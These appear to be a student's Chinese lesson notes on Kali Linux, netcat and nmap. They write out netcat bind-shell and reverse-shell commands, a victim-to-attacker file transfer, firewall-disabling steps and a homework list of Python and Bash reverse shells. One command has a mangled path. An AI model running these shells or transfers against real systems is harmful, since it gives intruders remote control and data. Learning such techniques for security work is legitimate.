第六课 Kali Linux基础应用 笔记+作业

一、内容概要

• Kali基础
• netcat与nmap使用

二、知识点

1. Kali优化

• 更改镜像源：/etc/apt/sources.list
  vi /etc/apt/sources.list
• kali切换root用户：sudo su
• 更新软件数据库：sudo apt-get update
• 更新软件：sudo apt-get upgrade
• 设置语言包：sudo dpkg-reconfigure locales
• 修改缩放比例：hidpi

2. netcat

nc可以在两台设备上面相互交互，即侦听模式/传输文件

1. nc [可选参数] ip 端口

2. 用途：网络工具 入侵到服务器 将受害者的命令行窗口拿到自己的电脑上 - getshell

3. 获取shell

   1. 正向shell
      受害者开启shell之后，我们去主动连接

      • Linux控制Windows

        Windows绑定CMD到本地5566端口
        nc -e cmd -lvp 5566
        Linux主动连接目标5566
        
        nc ip地址 5566
        
        

        chcp 65001 → 解决乱码问题

      • Windows控制Linux

        Linux绑定SH到本地5566端口
        nc -e bin/bash/ -lvp 5566
        Windows主动连接目标5566
        
        nc ip地址 5566
        
        

   2. 反向shell
      攻击者（我们）开启监听，受害者主动来找我们
      ​nc反弹​：必须攻击者先监听后，受害者才可以执行命令进行连接
      其他反弹shell： https://forum.ywhack.com/reverse-shell/ → 需要根据目标计算机内环境选择
      • 控制Linux

        Windows开启本地5566端口监听
        nc -lvvp 5566
        Linux绑定CMD到目标5566端口
        
        nc -e /bin/sh ip地址 5566
        
        

      • 控制Windows

        攻击者等待5566连接
        nc -lvvp 5566
        Windows绑定sh到目标5566端口
        
        nc -e CMD ip地址 5566
        
        

   两台机器不在同一局域网内？
   反弹shell
   两台机器在同一局域网内依旧无法通信？
   关闭防火墙

   service firewalld status 查看防火墙状态
   sudo systemctl stop firewalld 关闭
   sudo systemctl start firewalld 开启
   sudo systemctl disable firewalld 永久关闭
   

4. 传输文件内容
   攻击者：nc -lvp 端口号 > 1.txt
   受害者：nc ip地址 端口号 < 1.txt
   攻击者的文件名随便，受害者必须有文件

3. 端口&利用工具

查看本机连接：netstat -antp

1. NMAP
   • 扫描（端口与服务）：nmap ip地址 (-p 指定端口/端口扫描范围)
2. 1-65535 端口范围
3. 端口对应服务

   服务	端口号
   HTTP	80
   HTTPS	443
   Telnet	23
   FTP	21
   SSH（安全登录）, SCP（文件传输）, 端口重新定向	22
   SMTP	25
   POP3	110
   WebLogic	7001
   TOMCAT	8080
   WIN2003远程登陆	3389
   Oracle数据库	1521
   MS SQL * SERVER数据库server	1433
   MySQL 数据库server	3306

作业

正向shell

反弹shell

Python反弹

Bash反弹

使用nmap中的脚本扫描自己的局域网主机

结合自己的理解，说明什么是端口，什么是服务，它俩之间的联系是什么：

端口是通信接口，服务是提供功能的程序，服务通过端口被访问。